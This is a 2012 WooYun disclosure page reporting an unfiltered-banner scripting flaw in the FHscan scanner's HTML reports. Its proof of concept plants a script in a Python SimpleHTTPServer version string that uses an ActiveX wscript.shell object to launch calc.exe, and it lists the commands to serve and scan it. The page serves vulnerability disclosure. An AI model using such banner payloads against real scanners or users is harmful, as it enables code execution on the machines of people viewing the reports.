当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-08794

漏洞标题:FHscan location Cross-Domain Scripting Vulnerability

相关厂商:tarasco.org

漏洞作者: 猪猪侠

提交时间:2012-06-26 19:05

修复时间:2012-08-10 19:06

公开时间:2012-08-10 19:06

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-06-26: 细节已通知厂商并且等待厂商处理中
2012-06-29: 厂商已经确认,细节仅向厂商公开
2012-07-02: 细节向第三方安全合作伙伴开放
2012-08-23: 细节向核心白帽子及相关领域专家公开
2012-09-02: 细节向普通白帽子公开
2012-09-12: 细节向实习白帽子公开
2012-08-10: 细节向公众公开

简要描述:

生成扫描报告时,未严格过滤数据。

详细说明:

Change httpd banner to:

SimpleHTTP/0.8<script>var objShell = new ActiveXObject("wscript.shell");objShell.Run("calc.exe");objShell = null;</script> Python/2.7.3


change Python SimpleHTTPServer lib to:

"""Simple HTTP Server.
This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.
"""
__version__ = "0.8<script>var objShell = new ActiveXObject(\"wscript.shell\");objShell.Run(\"calc.exe\");objShell = null;</script>"


Start httpd service on 80 port:

python -m SimpleHTTPServer 80


Scan the Web service:

FHscan.exe --ports 80 --hosts 127.0.0.1-127.0.0.1


View the report:


漏洞证明:

同上

修复方案:

Modify the report generation template!

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2012-06-29 15:21

厂商回复:

CNVD确认漏洞情况,将直接协调生产厂商处置(尚未建立联系渠道),协调时间可能较长。
这个漏洞涉及终端专业用户,按本地攻击评分,rank=7.15(高危)*1.2*1.1=9.438

最新状态:

暂无